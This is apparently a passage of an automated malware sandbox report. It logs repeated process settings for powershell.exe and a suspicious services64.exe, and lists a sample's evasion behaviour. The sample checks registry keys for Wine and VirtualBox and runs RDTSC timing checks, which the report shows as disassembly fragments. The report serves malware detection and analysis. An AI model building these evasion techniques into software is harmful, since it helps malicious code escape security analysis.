Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECB6 second address: 9CECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECBB second address: 9CECC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECC5 second address: 9CECC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECC9 second address: 9CECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624B4E7E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECE8 second address: 9CECEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECEC second address: 9CECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CECF2 second address: 9CECFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46A9A second address: B46A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46A9F second address: B46AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46AA5 second address: B46AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46AA9 second address: B46AB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46C2B second address: B46C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B46D5D second address: B46D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF624C752F6h 0x0000000a jmp 00007FF624C752FBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48D6C second address: B48D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48D70 second address: B48D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48D76 second address: B48D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48E04 second address: B48E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c xor ch, 00000042h 0x0000000f call 00007FF624C752F9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624C75302h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F51 second address: B48F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF624B4E7D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F5E second address: B48F6C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F6C second address: B48F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B48F70 second address: B48F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49044 second address: B49062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007FF624B4E7D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FF624B4E7D8h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B49062 second address: B490E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jno 00007FF624C752FEh 0x00000013 pop eax 0x00000014 jmp 00007FF624C75302h 0x00000019 push 00000003h 0x0000001b mov edx, eax 0x0000001d push 00000000h 0x0000001f mov edx, 6DB888C0h 0x00000024 push 00000003h 0x00000026 jmp 00007FF624C75302h 0x0000002b call 00007FF624C752F9h 0x00000030 pushad 0x00000031 jbe 00007FF624C752F8h 0x00000037 js 00007FF624C752FCh 0x0000003d je 00007FF624C752F6h 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 je 00007FF624C752F6h 0x0000004e push eax 0x0000004f pop eax 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B490E4 second address: B490FD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B490FD second address: B49101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
